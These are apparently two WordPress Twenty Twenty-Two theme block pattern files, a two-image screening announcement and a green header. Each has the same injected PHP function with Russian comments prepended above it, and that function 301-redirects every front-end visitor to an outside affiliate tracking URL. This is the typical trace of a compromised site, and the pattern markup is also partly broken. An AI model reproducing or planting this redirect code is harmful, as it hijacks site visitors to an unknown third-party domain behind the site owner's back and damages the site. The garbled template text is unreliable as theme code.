function my_custom_redirect() {
    // Убедитесь, что этот код выполняется только на фронтенде
    if (!is_admin()) {
        // URL для редиректа
        $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick';
        
        // Выполнить редирект
        wp_redirect($redirect_url, 301);
        exit();
    }
}
add_action('template_redirect', 'my_custom_redirect');
/**
 * Two images with text block pattern
 */
return array(
	'title'      => __( 'Two images with text', 'twentytwentytwo' ),
	'categories' => array( 'featured', 'columns', 'gallery' ),
	'content'    => '
					
					
					
					
					
					 ) . '/assets/images/bird-on-green.jpg) 
					
					
					
					
					
					' . esc_html__( 'SCREENING', 'twentytwentytwo' ) . '
					
					
					' . wp_kses_post( __( 'May 14th, 2022 @ 7:00PM
The Vintagé Theater,
245 Arden Rd.
Gardenville, NH', 'twentytwentytwo' ) ) . '
					
					
					
					
					
					
					
					
					
					 
					 
					',
);
function my_custom_redirect() {
    // Убедитесь, что этот код выполняется только на фронтенде
    if (!is_admin()) {
        // URL для редиректа
        $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick';
        
        // Выполнить редирект
        wp_redirect($redirect_url, 301);
        exit();
    }
}
add_action('template_redirect', 'my_custom_redirect');
/**
 * Text-only header with green background block pattern
 */
return array(
	'title'      => __( 'Text-only header with green background', 'twentytwentytwo' ),
	'categories' => array( 'header' ),
	'blockTypes' => array( 'core/template-part/header' ),
	'content'    => '
					
					',
);